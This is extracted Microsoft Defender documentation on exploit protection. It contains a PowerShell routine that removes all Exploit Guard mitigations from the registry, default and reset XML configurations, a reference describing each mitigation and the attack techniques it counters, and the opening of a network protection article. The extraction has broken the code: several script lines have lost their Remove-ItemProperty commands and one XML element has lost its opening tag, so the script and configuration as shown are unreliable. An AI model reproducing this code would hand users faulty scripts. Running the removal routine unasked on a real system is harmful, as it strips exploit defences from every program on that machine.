([Security.Principal.WindowsPrincipal]
[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.
Principal.WindowsBuiltInRole] "Administrator")
}
# Delete ExploitGuard ProcessMitigations for a given key in the

registry. If no other settings exist under the specified key,
# the key is deleted as well
function Remove-ProcessMitigations([Object] $Key, [string] $Name) {
Try {
if ($Key.GetValue("MitigationOptions")) {
Write-Host "Removing MitigationOptions for: " $Name
Remove-ItemProperty -Path $Key.PSPath -Name
"MitigationOptions" -ErrorAction Stop;
}
if ($Key.GetValue("MitigationAuditOptions")) {
Write-Host "Removing MitigationAuditOptions for: " $Name
"MitigationAuditOptions" -ErrorAction Stop;
}
if ($Key.GetValue("EAFModules")) {
Write-Host "Removing EAFModules for: " $Name
Remove-ItemProperty -Path $Key.PSPath -Name "EAFModules" -
ErrorAction Stop;
}
# Remove the FilterFullPath value if there is nothing else

if (($Key.SubKeyCount -eq 0) -and ($Key.ValueCount -eq 1) -and
($Key.GetValue("FilterFullPath"))) {
"FilterFullPath" -ErrorAction Stop;
}
# If the key is empty now, delete it

if (($Key.SubKeyCount -eq 0) -and ($Key.ValueCount -eq 0)) {
Write-Host "Removing empty Entry: " $Name
Remove-Item -Path $Key.PSPath -ErrorAction Stop
}
}
Catch {
Write-Host "ERROR:" $_.Exception.Message "- at
($MitigationItemName)"
}
}
# Delete all ExploitGuard ProcessMitigations

function Remove-All-ProcessMitigations {
if (!(Test-IsAdmin)) {
throw "ERROR: No Administrator-Privileges detected!"; return
}
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Image File Execution Options" | ForEach-Object {
$MitigationItem = $_;
$MitigationItemName = $MitigationItem.PSChildName
Try {
Remove-ProcessMitigations $MitigationItem
$MitigationItemName
# "UseFilter" indicate full path filters may be present

if ($MitigationItem.GetValue("UseFilter")) {
Get-ChildItem -Path $MitigationItem.PSPath | ForEach-
Object {
$FullPathItem = $_
if ($FullPathItem.GetValue("FilterFullPath")) {
$Name = $MitigationItemName + "-" +
$FullPathItem.GetValue("FilterFullPath")
Write-Host "Removing FullPathEntry:
" $Name
Remove-ProcessMitigations $FullPathItem $Name
}
# If there are no subkeys now, we can delete the

"UseFilter" value
if ($MitigationItem.SubKeyCount -eq 0) {
Remove-ItemProperty -Path
$MitigationItem.PSPath -Name "UseFilter" -ErrorAction Stop
}
}
}
if (($MitigationItem.SubKeyCount -eq 0) -and
($MitigationItem.ValueCount -eq 0)) {
Write-Host "Removing empty Entry: "
$MitigationItemName
Remove-Item -Path $MitigationItem.PSPath -ErrorAction
Stop
}
}
Catch {
Write-Host "ERROR:" $_.Exception.Message "- at
($MitigationItemName)"
}
}
}
# Delete all ExploitGuard System-wide Mitigations

function Remove-All-SystemMitigations {
if (!(Test-IsAdmin)) {
throw "ERROR: No Administrator-Privileges detected!"; return
}
$Kernel = Get-Item -Path

"HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel"
Try {
if ($Kernel.GetValue("MitigationOptions"))
{ Write-Host "Removing System MitigationOptions"
Remove-ItemProperty -Path $Kernel.PSPath -Name
"MitigationOptions" -ErrorAction Stop;
}
if ($Kernel.GetValue("MitigationAuditOptions"))
{ Write-Host "Removing System MitigationAuditOptions"
Remove-ItemProperty -Path $Kernel.PSPath -Name
"MitigationAuditOptions" -ErrorAction Stop;
}
} Catch {
Write-Host "ERROR:" $_.Exception.Message "- System"
}
}
Remove-All-ProcessMitigations
Remove-All-SystemMitigations
2. Create and import an XML configuration file with the following default mitigations,
as described in Import, export, and deploy Exploit Protection configurations:
XML

<root>
<SystemConfig/>
<AppConfig Executable="ExtExport.exe">
<ASLR OverrideForceRelocateImages="false"
ForceRelocateImages="false" Enable="true"/>
</AppConfig>
<AppConfig Executable="ie4uinit.exe">
</AppConfig>
<AppConfig Executable="ieinstal.exe">
</AppConfig>
<AppConfig Executable="ielowutil.exe">
</AppConfig>
<AppConfig Executable="ieUnatt.exe">
</AppConfig>
<AppConfig Executable="iexplore.exe">
</AppConfig>
<AppConfig Executable="mscorsvw.exe">
<ExtensionPoints OverrideExtensionPoint="false"
DisableExtensionPoints="true"/>
</AppConfig>
<AppConfig Executable="msfeedssync.exe">
</AppConfig>
<AppConfig Executable="mshta.exe">
</AppConfig>
<AppConfig Executable="ngen.exe">
</AppConfig>
<AppConfig Executable="ngentask.exe">
</AppConfig>
<AppConfig Executable="PresentationHost.exe">
<DEP Enable="true" OverrideDEP="false"
EmulateAtlThunks="false"/>
ForceRelocateImages="false" Enable="true" OverrideBottomUp="false"
HighEntropy="true" BottomUp="true"/>
<SEHOP Enable="true" OverrideSEHOP="false"
TelemetryOnly="false"/>
<Heap OverrideHeap="false" TerminateOnError="true"/>
</AppConfig>
<AppConfig Executable="PrintDialog.exe">
</AppConfig>
<AppConfig Executable="PrintIsolationHost.exe"/>
<AppConfig Executable="runtimebroker.exe">
</AppConfig>
<AppConfig Executable="splwow64.exe"/>
<AppConfig Executable="spoolsv.exe"/>
<AppConfig Executable="svchost.exe"/>
<AppConfig Executable="SystemSettings.exe">
</AppConfig>
</root>
If you haven't already, it's a good idea to download and use the Windows Security
Baselines to complete your Exploit protection customization.
Related topics
 Tip
Feedback

Exploit protection reference
Article • 11/07/2023
Applies to:

Exploit protection provides advanced protections for applications that enterprise admins
and IT pros can apply after a developer has compiled and distributed software.
This article helps you understand how exploit protection works, both at the policy level
and at the individual mitigation level, to help you successfully build and apply exploit
protection policies.
How mitigations are applied

Exploit protection mitigations are applied per application.
Mitigations are configured via a registry entry for each program that you configure
protections for. These settings are stored in the MitigationOptions registry entry for
each program ( HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\*ImageFileName*\MitigationOptions ).
They take effect when you restart the program, and remain effective until you change
them and restart the program again.
） Important
Image file execution options only allows you to specify a file name or path, and not
a version number, architecture, or any other differentiator. Be careful to target
mitigations to apps which have unique names or paths, applying them only on
devices where you have tested that version and that architecture of the application.
If you configure exploit protection mitigations using an XML configuration file by using
PowerShell, Group Policy, or MDM, when processing this XML configuration file,
individual registry settings are configured for you.
When the policy distributing the XML file is no longer enforced, settings deployed by
this XML configuration file won't be automatically removed. To remove Exploit
Protection settings, export the XML configuration from a clean Windows 10 or Windows
11 device, and deploy this new XML file. Alternately, Microsoft provides an XML file as
part of the Windows Security Baselines for resetting Exploit Protection settings.
To reset exploit protection settings using PowerShell, use the following command:
PowerShell
Set-ProcessMitigation -PolicyFilePath EP-reset.xml
Following is the EP-reset.xml distributed with the Windows Security Baselines:
XML

<MitigationPolicy>
<AppConfig Executable="ONEDRIVE.EXE">
<DEP OverrideDEP="false" />
<ASLR OverrideRelocateImages="false" />
<Payload OverrideEnableExportAddressFilter="false"
OverrideEnableExportAddressFilterPlus="false"
OverrideEnableImportAddressFilter="false"
OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false"
OverrideEnableRopSimExec="false" />
<ImageLoad OverrideBlockRemoteImages="false" />
</AppConfig>
<AppConfig Executable="firefox.exe">
<ASLR ForceRelocateImages="true" />
</AppConfig>
<AppConfig Executable="fltldr.exe">
<ChildProcess OverrideChildProcess="false" />
</AppConfig>
<AppConfig Executable="GROOVE.EXE">
<ChildProcess OverrideChildProcess="false" />
</AppConfig>
<AppConfig Executable="Acrobat.exe">
</AppConfig>
<AppConfig Executable="AcroRd32.exe">
</AppConfig>
<AppConfig Executable="chrome.exe">
</AppConfig>
<AppConfig Executable="EXCEL.EXE">
</AppConfig>
<AppConfig Executable="iexplore.exe">
</AppConfig>
<AppConfig Executable="INFOPATH.EXE">
</AppConfig>
<AppConfig Executable="java.exe">
</AppConfig>
<AppConfig Executable="javaw.exe">
</AppConfig>
<AppConfig Executable="javaws.exe">
</AppConfig>
<AppConfig Executable="LYNC.EXE">
</AppConfig>
<AppConfig Executable="MSACCESS.EXE">
</AppConfig>
<AppConfig Executable="MSPUB.EXE">
</AppConfig>
<AppConfig Executable="OIS.EXE">
</AppConfig>
<AppConfig Executable="OUTLOOK.EXE">
</AppConfig>
<AppConfig Executable="plugin-container.exe">
</AppConfig>
<AppConfig Executable="POWERPNT.EXE">
</AppConfig>
<AppConfig Executable="PPTVIEW.EXE">
</AppConfig>
<AppConfig Executable="VISIO.EXE">
</AppConfig>
<AppConfig Executable="VPREVIEW.EXE">
</AppConfig>
<AppConfig Executable="WINWORD.EXE">
</AppConfig>
<AppConfig Executable="wmplayer.exe">
</AppConfig>
<AppConfig Executable="wordpad.exe">
</AppConfig>
</MitigationPolicy>
Mitigation Reference
The following sections detail the protections provided by each exploit protection
mitigation, the compatibility considerations for the mitigation, and the configuration
options available.
Arbitrary code guard
Description
Arbitrary code guard helps protect against a malicious attacker loading the code of their
choice into memory through a memory safety vulnerability and being able to execute
that code.
Arbitrary code guard protects an application from executing dynamically generated

code (code that isn't loaded, for example, from the exe itself or a dll). Arbitrary code
guard works by preventing memory from being marked as executable. When an
application attempts to allocate memory, we check the protection flags. (Memory can
be allocated with read, write, and/or execute protection flags.) If the allocation attempts
to include the execute protection flag, then the memory allocation fails and returns an
error code (STATUS_DYNAMIC_CODE_BLOCKED). Similarly, if an application attempts to
change the protection flags of memory that has already been allocated and includes the
execute protection flag, then the permission change fails and returns an error code
(STATUS_DYNAMIC_CODE_BLOCKED).
By preventing the execute flag from being set, the data execution prevention feature of
Windows 10 and Windows 11 can then protect against the instruction pointer being set
to that memory and running that code.
Compatibility considerations
Arbitrary code guard prevents allocating any memory as executable, which presents a
compatibility issue with approaches such as Just-in-Time (JIT) compilers. Most modern
browsers, for example, compile JavaScript into native code in order to optimize
performance. In order to support this mitigation, they'll need to be rearchitected to
move the JIT compilation outside of the protected process. Other applications whose
design dynamically generates code from scripts or other intermediate languages are
similarly incompatible with this mitigation.
Configuration options
Allow thread opt-out - You can configure the mitigation to allow an individual thread to
opt-out of this protection. The developer must have written the application with
awareness of this mitigation, and have called the SetThreadInformation API with the
ThreadInformation parameter set to ThreadDynamicCodePolicy in order to be allowed
to execute dynamic code on this thread.
Audit only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Defender for Endpoint.
Block low integrity images
Description
Block low integrity images prevents the application from loading files that are untrusted,
typically because they've been downloaded from the internet from a sandboxed
browser.
This mitigation blocks image loads if the image has an Access Control Entry (ACE) which
grants access to Low IL processes and which doesn't have a trust label ACE. It's
implemented by the memory manager, which blocks the file from being mapped into
memory. If an application attempts to map a low integrity image, it triggers a
STATUS_ACCESS_DENIED error. For details on how integrity levels work, see Mandatory
Integrity Control.
Block low integrity images prevent the application from loading files that were
downloaded from the internet. If your application workflow requires loading images that
are downloaded, you'll want to ensure that they're downloaded from a higher-trust
process, or are explicitly relabeled in order to apply this mitigation.
Audit Only - You can enable this mitigation in audit mode in order to measure the
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.
Block remote images
Description
Blocking remote images helps to prevent the application from loading files that are
hosted on a remote device, such as a UNC share. Blocking remote images helps protect
against loading binaries into memory that are on an external device controlled by the
attacker.
This mitigation blocks image loads if the image is determined to be on a remote device.
It's implemented by the memory manager, which blocks the file from being mapped
into memory. If an application attempts to map a remote file, it triggers a
STATUS_ACCESS_DENIED error.
Block remote images prevent the application from loading images from remote devices.
If your application loads files or plug-ins from remote devices, then it will not be
compatible with this mitigation.
Block untrusted fonts
Description
Block untrusted fonts mitigates the risk of a flaw in font parsing leading to the attacker
being able to run code on the device. Only fonts that are installed into the
windows\fonts directory will be loaded for processing by GDI.
This mitigation is implemented within GDI, which validates the location of the file. If the
file isn't in the system fonts directory, the font won't be loaded for parsing and that call
will fail.
This mitigation is in addition to the built-in mitigation provided in Windows 10 1607

and later, and Windows 11, which moves font parsing out of the kernel and into a user-
mode app container. Any exploit based on font parsing, as a result, happens in a
sandboxed and isolated context, which reduces the risk significantly. For details on this
mitigation, see the blog Hardening Windows 10 with zero-day exploit mitigations .
The most common use of fonts outside of the system fonts directory is with web fonts.
Modern browsers, such as Microsoft Edge, use DirectWrite instead of GDI, and aren't
impacted. However, legacy browsers, such as Internet Explorer 11 (and IE mode in the
new Microsoft Edge) can be impacted, particularly with applications such as Office 365,
which use font glyphs to display UI.
Code integrity guard
Description
Code integrity guard ensures that all binaries loaded into a process are digitally signed
by Microsoft. Code integrity guard includes WHQL (Windows Hardware Quality Labs)
signatures, which allows WHQL-approved drivers to run within the process.
This mitigation is implemented within the memory manager, which blocks the binary
from being mapped into memory. If you attempt to load a binary that isn't signed by
Microsoft, the memory manger returns the error STATUS_INVALID_IMAGE_HASH. By
blocking at the memory manager level, this prevents both binaries loaded by the
process and binaries injected into the process.
This mitigation specifically blocks any binary that isn't signed by Microsoft. As such, it is
incompatible with most third-party software, unless that software is distributed by (and
digitally signed by) the Microsoft Store, and the option to allow loading of images
signed by the Microsoft Store is selected.
Also allow loading of images signed by Microsoft Store - Applications that are
distributed by the Microsoft Store are digitally signed by the Microsoft Store, and
adding this configuration allows binaries that have gone through the store certification
process to be loaded by the application.
Control flow guard (CFG)
Description
Control flow guard (CFG) mitigates the risk of attackers using memory corruption
vulnerabilities by protecting indirect function calls. For example, an attacker may use a
buffer overflow vulnerability to overwrite memory containing a function pointer, and
replace that function pointer with a pointer to executable code of their choice (which
may also have been injected into the program).
This mitigation is provided by injecting another check at compile time. Before each
indirect function call, another instructions are added which verify that the target is a
valid call target before it's called. If the target isn't a valid call target, then the
application is terminated. As such, only applications that are compiled with CFG support
can benefit from this mitigation.
The check for a valid target is provided by the Windows kernel. When executable files
are loaded, the metadata for indirect call targets is extracted at load time and marked as
valid call targets. Additionally, when memory is allocated and marked as executable
(such as for generated code), these memory locations are also marked as valid call
targets, to support mechanisms such as JIT compilation.
Since applications must be compiled to support CFG, they implicitly declare their
compatibility with it. Most applications, therefore, should work with this mitigation
enabled. Because these checks are compiled into the binary, the configuration you can
apply is merely to disable checks within the Windows kernel. In other words, the
mitigation is on by default, but you can configure the Windows kernel to always return
"yes" if you later determine that there's a compatibility issue that the application
developer didn't discover in their testing, which should be rare.
Use strict CFG - In strict mode, all binaries loaded into the process must be compiled for
Control Flow Guard (or have no executable code in them - such as resource dlls) in order
to be loaded.
７ Note
Control flow guard has no audit mode. Binaries are compiled with this mitigation
enabled.
Data Execution Prevention (DEP)
Description
Data execution prevention (DEP) prevents memory that wasn't explicitly allocated as
executable from being executed. DEP helps protect against an attacker injecting
malicious code into the process, such as through a buffer overflow, and then executing
that code.
If you attempt to set the instruction pointer to a memory address not marked as
executable, the processor throws an exception (general-protection violation), causing
the application to crash.
All x64, ARM, and ARM-64 executables have DEP enabled by default, and it can't be
disabled. Since an application has never been executed without DEP, compatibility is
assumed.
All x86 (32-bit) binaries have DEP enabled by default, but DEP can be disabled per
process. Some old legacy applications, typically applications developed prior to
Windows XP SP2, might not be compatible with DEP. Such applications typically
generate code dynamically (for example, JIT compiling) or link to older libraries (such as
older versions of ATL) which dynamically generate code.
Enable ATL Thunk emulation - This configuration option disables ATL Thunk emulation.
ATL, the ActiveX Template Library, is designed to be as small and fast as possible. In
order to reduce binary size, it would use a technique called thunking. Thunking is
typically thought of for interacting between 32-bit and 16-bit applications, but there are
no 16-bit components to ATL here. Rather, in order to optimize for binary size, ATL
stores machine code in memory that isn't word-aligned (creating a smaller binary), and
then invoke that code directly. ATL components compiled with Visual Studio 7.1 or
earlier (Visual Studio 2003) don't allocate this memory as executable - thunk emulation
resolves that compatibility issue. Applications that have a binary extension model (such
as Internet Explorer 11) will often need to have ATL Thunk emulation enabled.
Disable extension points
Description
This mitigation disables various extension points for an application, which might be
used to establish persistence or elevate privileges of malicious content.
This includes:
AppInit DLLs - Whenever a process starts, the system loads the specified DLL into
to context of the newly started process before calling its entry point function.
Details on AppInit DLLs can be found here. With this mitigation applied, AppInit
DLLs aren't loaded. Beginning with Windows 7, AppInit DLLs need to be digitally
signed, as described here. Additionally, beginning with Windows 8, AppInit DLLs
won't be loaded if SecureBoot is enabled, as described here.
Legacy IMEs - An Input Method Editor (IME) allows a user to type text in a
language that has more characters than can be represented on a keyboard. Third
parties are able to create IMEs. A malicious IME might obtain credentials or other
sensitive information from this input capture. Some IMEs, referred to as Legacy
IMEs, only work on Windows Desktop apps, and not UWP apps. This mitigation
also prevents this legacy IME from loading into the specified Windows Desktop
app.
Windows Event Hooks - An application can call the SetWinEventHook API to
register interest in an event taking place. A DLL is specified and can be injected
into the process. This mitigation forces the hook to be posted to the registering
process rather than running in-process through an injected DLL.
Most of these extension points are relatively infrequently used, so compatibility impact
is typically small, particularly at an individual application level. The one consideration is if
users are using third-party Legacy IMEs that won't work with the protected application.
There are no configuration options for this mitigation.
７ Note
Disable extension points has no audit mode.
Disable Win32k system calls
Description
Win32k.sys provides a broad attack surface for an attacker. As a kernel-mode
component, it's frequently targeted as an escape vector for applications that are
sandboxed. This mitigation prevents calls into win32k.sys by blocking a thread from
converting itself into a GUI thread, which is then given access to invoke Win32k
functions. A thread is non-GUI when created, but converted on first call to win32k.sys, or
through an API call to IsGuiThread.
This mitigation is designed for processes that are dedicated non-UI processes. For
example, many modern browsers use process isolation and incorporate non-UI
processes. Any application that displays a GUI using a single process will be impacted by
this mitigation.
Don't allow child processes
Description
This mitigation prevents an application from creating new child applications. A common
technique used by adversaries is to initiate a trusted process on the device with
malicious input (a "living off the land" attack), which often requires launching another
application on the device. If there are no legitimate reasons why an application would
launch a child process, this mitigation mitigates that potential attack vector. The
mitigation is applied by setting a property on the process token, which blocks creating a
token for the child process with the error message STATUS_CHILD_PROCESS_BLOCKED.
If your application launches child applications for any reason, such as supporting
hyperlinks that launch a browser or an external browser, or which launch other utilities
on the computer, this functionality will be broken with this mitigation applied.
Export address filtering

Description
Export address filtering (EAF) mitigates the risk of malicious code looking at the export
address table of all loaded modules to find modules that contain useful APIs for their
attack. This is a common tactic used by shellcode. In order to mitigate the risk of such
an attack, this mitigation protects three commonly attacked modules:
ntdll.dll
kernelbase.dll
kernel32.dll
The mitigation protects the memory page in the [export directory that points to the
export address table. This memory page will have the PAGE_GUARD protection applied
to it. When someone tries to access this memory, it generates a
STATUS_GUARD_PAGE_VIOLATION. The mitigation handles this exception, and if the
accessing instruction doesn't pass validation, the process is terminated.
This mitigation is primarily an issue for applications such as debuggers, sandboxed
applications, applications using DRM, or applications that implement anti-debugging
technology.
Validate access for modules that are commonly abused by exploits - This option, also
known as EAF+, adds protections for other commonly attacked modules:
mshtml.dll
flash*.ocx
jscript*.ocx
vbscript.dll
vgx.dll
mozjs.dll
xul.dll
acrord32.dll
acrofx32.dll
acroform.api
Additionally, by enabling EAF+, this mitigation adds the PAGE_GUARD protection to the
page containing the "MZ" header, the first two bytes of the DOS header in a PE file,
which is another aspect of known memory content which shellcode can look for to
identify modules potentially of interest in memory.
Force randomization for images (Mandatory

ASLR)
Description
Address Space Layout Randomization (ASLR) mitigates the risk of an attacker using their
knowledge of the memory layout of the system in order to execute code that is already
present in process memory and already marked as executable. This can mitigate the risk
of an attacker using techniques such as return-to-libc attacks, where the adversary sets
the context and then modifies the return address to execute existing code with context
that suits the adversary's purpose.
Mandatory ASLR forces a rebase of all DLLs within the process. A developer can enable
ASLR using the /DYNAMICBASE linker option, and this mitigation has the same effect.
When the memory manager is mapping in the image into the process, Mandatory ASLR
will forcibly rebase DLLs and EXEs that haven't opted in to ASLR. Note, however, that this
rebasing has no entropy, and can therefore be placed at a predictable location in
memory. For rebased and randomized location of binaries, this mitigation should be
paired with Randomize memory allocations (Bottom-up ASLR).
This compatibility impact of ASLR is typically constrained to older applications that were
built using compilers that made assumptions about the base address of a binary file or
have stripped out base relocation information. This can lead to unpredictable errors as
the execution flow attempts to jump to the expected, rather than the actual, location in
memory.
Do not allow stripped images - This option blocks the loading of images that have had
relocation information stripped. The Windows PE file format contains absolute
addresses, and the compiler also generates a [base relocation table that the loader can
use to find all relative memory references and their offset, so they can be updated if the
binary doesn't load at its preferred base address. Some older applications strip out this
information in production builds, and therefore these binaries can't be rebased. This
mitigation blocks such binaries from being loaded (instead of allowing them to load at
their preferred base address).
７ Note
Force randomization for images (Mandatory ASLR) has no audit mode.
Hardware-enforced stack protection
Description
Hardware-enforced stack protection offers robust protection against ROP exploits since
it maintains a record of the intended execution flow of a program. To ensure smooth
ecosystem adoption and application compatibility, Windows will offer this protection as
an opt-in model, so developers can receive this protection, at your own pace.
Hardware-enforced stack protection will only work on chipsets with support for
hardware shadow stacks, Intel's Control-flow Enforcement Technology (CET) or AMD
shadow stacks.
Audit only - You can enable this mitigation in audit mode in order to measure the
in the event viewer or using Advanced Hunting in Defender for Endpoint.
Enforce for all modules instead of Compatible modules - You can enable this
mitigation to Enforce for all modules instead of Compatible modules.
Import address filtering (IAF)
Description
The import address filtering (IAF) mitigation helps mitigate the risk of an adversary
changing the control flow of an application by modifying the import address table (IAT)
to redirect to arbitrary code of the attacker's choice when that function is called. An
attacker could use this approach to hijack control, or to intercept, inspect, and
potentially block calls to sensitive APIs.
The memory pages for all protected APIs have the PAGE_GUARD protection applied to
them. When someone tries to access this memory, it generates a
STATUS_GUARD_PAGE_VIOLATION. The mitigation handles this exception, and if the
accessing instruction doesn't pass validation, the process is terminated.
This mitigation protects the following Windows APIs:
GetProcAddress
GetProcAddressForCaller
LoadLibraryA
LoadLibraryExA
LoadLibraryW
LoadLibraryExW
LdrGetProcedureAddress
LdrGetProcedureAddressEx
LdrGetProcedureAddressForCaller
LdrLoadDll
VirtualProtect
VirtualProtectEx
VirtualAlloc
VirtualAllocEx
NtAllocateVirtualMemory
NtProtectVirtualMemory
CreateProcessA
CreateProcessW
WinExec
CreateProcessAsUserA
CreateProcessAsUserW
GetModuleHandleA
GetModuleHandleW
RtlDecodePointer
DecodePointer
Legitimate applications that perform API interception may be detected by this
mitigation and cause some applications to crash. Examples include security software and
application compatibility shims.
Randomize memory allocations (Bottom-up

ASLR)
Description
Randomize memory allocations (Bottom-up ASLR) adds entropy to relocations, so their
location is randomized and therefore less predictable. This mitigation requires
Mandatory ASLR to take effect.
The size of the 32-bit address space places practical constraints on the entropy that can
be added, and therefore 64-bit applications make it more difficult for an attacker to
guess a location in memory.
Most applications that are compatible with Mandatory ASLR (rebasing) are also
compatible with the other entropy of Bottom-up ASLR. Some applications may have
pointer-truncation issues if they're saving local pointers in 32-bit variables (expecting a
base address below 4 GB), and thus will be incompatible with the high entropy option
(which can be disabled).
Don't use high entropy - this option disables the use of high-entropy ASLR, which adds
24 bits of entropy (1 TB of variance) into the bottom-up allocation for 64-bit
applications.
７ Note
Randomize memory allocations (Bottom-up ASLR) has no audit mode.
Simulate execution (SimExec)
Description
Simulate execution (SimExec) is a mitigation for 32-bit applications only. This helps
validate that calls to sensitive APIs will return to legitimate caller functions. It does this
by intercepting calls into sensitive APIs, and then simulating the execution of those APIs
by walking through the encoded assembly language instructions looking for the RET
instruction, which should return to the caller. It then inspects that function and walks
backwards in memory to find the preceding CALL instruction to determine whether the
function and CALL instruction match, and that the RET hasn't been intercepted.
The APIs intercepted by this mitigation are:
LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
LdrLoadDll
VirtualAlloc
VirtualAllocEx
VirtualProtect
VirtualProtectEx
HeapCreate
RtlCreateHeap
CreateProcessA
CreateProcessW
CreateProcessInternalA
CreateProcessInternalW
NtCreateUserProcess
NtCreateProcess
NtCreateProcessEx
CreateRemoteThread
CreateRemoteThreadEx
NtCreateThreadEx
WriteProcessMemory
NtWriteVirtualMemory
WinExec
CreateFileMappingA
CreateFileMappingW
CreateFileMappingNumaW
NtCreateSection
MapViewOfFile
MapViewOfFileEx
MapViewOfFileFromApp
If a ROP gadget is detected, the process is terminated.
Applications that perform API interception, particularly security software, can cause
compatibility problems with this mitigation.
This mitigation is incompatible with the Arbitrary Code Guard mitigation.
Validate API invocation (CallerCheck)
Description
Validate API invocation (CallerCheck) is a mitigation for return-oriented programming
(ROP) techniques that validates that sensitive APIs were called from a valid caller. This
mitigation inspects the passed return address, and then heuristically disassembles
backwards to find a call above the return address to determine if the call target matches
the parameter passed into the function.
LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
LdrLoadDll
VirtualAlloc
VirtualAllocEx
VirtualProtect
VirtualProtectEx
HeapCreate
RtlCreateHeap
CreateProcessA
CreateProcessW
NtCreateUserProcess
NtCreateProcess
NtCreateProcessEx
CreateRemoteThread
NtCreateThreadEx
WriteProcessMemory
WinExec
CreateFileMappingA
CreateFileMappingW
NtCreateSection
MapViewOfFile
MapViewOfFileEx
If a ROP gadget is detected, the process is terminated.

Applications that perform API interception, particularly security software, can cause
compatibility problems with this mitigation.
Validate exception chains (SEHOP)
Description
Validate exception chains (SEHOP) is a mitigation against the Structured Exception
Handler (SEH) overwrite exploitation technique. Structured exception handling is the
process by which an application can ask to handle a particular exception. Exception
handlers are chained together, so that if one exception handler chooses not to handle a
particular exception, it can be passed on to the next exception handler in the chain until
one decides to handle it. Because the list of handler is dynamic, it's stored on the stack.
An attacker can use a stack overflow vulnerability to then overwrite the exception
handler with a pointer to the code of the attacker's choice.
This mitigation relies on the design of SEH, where each SEH entry contains both a
pointer to the exception handler, and a pointer to the next handler in the exception
chain. This mitigation is called by the exception dispatcher, which validates the SEH
chain when an exception is invoked. It verifies that:
All exception chain records are within the stack boundaries

All exception records are aligned
No exception handler pointers are pointing to the stack
There are no backward pointers
The exception chain ends at a known final exception handler
If these validations fail, then exception handling is aborted, and the exception won't be
handled.
Compatibility issues with SEHOP are relatively rare. It's uncommon for an application to
take a dependency on corrupting the exception chain. However, some applications are
impacted by the subtle changes in timing, which may manifest as a race condition that
reveals a latent multi-threading bug in the application.
７ Note
Validate exception chains (SEHOP) has no audit mode.
Validate handle usage
Description
Validate handle usage is a mitigation that helps protect against an attacker using an
existing handle to access a protected object. A handle is a reference to a protected
object. If application code is referencing an invalid handle, that could indicate that an
adversary is attempting to use a handle it has previously recorded (but which
application reference counting wouldn't be aware of). If the application attempts to use
an invalid object, instead of simply returning null, the application raises an exception
(STATUS_INVALID_HANDLE).
This mitigation is automatically applied to Windows Store applications.
Applications that weren't accurately tracking handle references, and which weren't
wrapping these operations in exception handlers, will potentially be impacted by this
mitigation.
７ Note
Validate handle usage has no audit mode.

Validate heap integrity
Description
The validate heap integrity mitigation increases the protection level of heap mitigations
in Windows, by causing the application to terminate if a heap corruption is detected.
The mitigations include:
Preventing a HEAP handle from being freed

Performing another validation on extended block headers for heap allocations
Verifying that heap allocations aren't already flagged as in-use
Adding guard pages to large allocations, heap segments, and subsegments above
a minimum size
This mitigation is already applied by default for 64-bit applications and for 32-bit
applications targeting Windows Vista or later. Legacy applications from Windows XP or
earlier are most at-risk, though compatibility issues are rare.
７ Note
Validate heap integrity has no audit mode.
Validate image dependency integrity
Description
The validate image dependency mitigation helps protect against attacks that attempt to
substitute code for dlls that are statically linked by Windows binaries. The technique of
DLL planting abuses the loader's search mechanism to inject malicious code, which can
be used to get malicious code running in an elevated context. When the loader is
loading a Windows signed binary, and then loads up any dlls that the binary depends
on, these binaries are verified to ensure that they're also digitally signed as a Windows
binary. If they fail the signature check, the dll won't be loaded, and throws an exception,
returning a status of STATUS_INVALID_IMAGE_HASH.
Compatibility issues are uncommon. Applications that depend on replacing Windows
binaries with local private versions are impacted, and there's also a small risk of
revealing subtle timing bugs in multi-threaded applications.
Validate stack integrity (StackPivot)
Description
The validate stack integrity (StackPivot) mitigation helps protect against the Stack Pivot
attack, a ROP attack where an attacker creates a fake stack in heap memory, and then
tricks the application into returning into the fake stack that controls the flow of
execution.
This mitigation intercepts many Windows APIs, and inspects the value of the stack
pointer. If the address of the stack pointer doesn't fall between the bottom and the top
of the stack, then an event is recorded and, if not in audit mode, the process is
terminated.
LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
LdrLoadDll
VirtualAlloc
VirtualAllocEx
VirtualProtect
VirtualProtectEx
HeapCreate
RtlCreateHeap
CreateProcessA
CreateProcessW
NtCreateUserProcess
NtCreateProcess
NtCreateProcessEx
CreateRemoteThread
NtCreateThreadEx
WriteProcessMemory
WinExec
CreateFileMappingA
CreateFileMappingW
NtCreateSection
MapViewOfFile
MapViewOfFileEx
Applications that are using fake stacks are impacted, and there's also a small risk of
revealing subtle timing bugs in multi-threaded applications. Applications that perform
API interception, particularly security software, can cause compatibility problems with
this mitigation.
 Tip
Feedback

Protect your network
Article • 02/02/2024
Applies to:

Platforms
Windows
macOS
Linux
Want to experience Microsoft Defender for Endpoint? Sign up for a free trial .
Overview of network protection

Network protection helps protect devices from Internet-based events. Network
protection is an attack surface reduction capability. It helps prevent employees from
accessing dangerous domains through applications. Domains that host phishing scams,
exploits, and other malicious content on the Internet are considered dangerous.
Network protection expands the scope of Microsoft Defender SmartScreen to block all
outbound HTTP(S) traffic that attempts to connect to low-reputation sources (based on
the domain or hostname).
Network protection extends the protection in Web protection to the operating system
level, and is a core component for Web Content Filtering (WCF). It provides the web
protection functionality found in Microsoft Edge to other supported browsers and non-
browser applications. Network protection also provides visibility and blocking of
indicators of compromise (IOCs) when used with Endpoint detection and response. For
example, network protection works with your custom indicators that you can use to
block specific domains or host names.
Network protection coverage

The following table summarizes network protection areas of coverage.
ﾉ Expand table
Feature Microsoft Edge 3rd-party browsers Non-browser processes

(e.g. PowerShell)
Web Threat SmartScreen must Network protection must Network protection must
Protection be enabled be in block mode be in block mode
Custom SmartScreen must Network protection must Network protection must

Indicators be enabled be in block mode be in block mode
Web Content SmartScreen must Network protection must Not supported

Filtering be enabled be in block mode
７ Note
On Mac and Linux, you must have network protection in block mode to get support
for these features in Edge. On Windows, network protection does not monitor
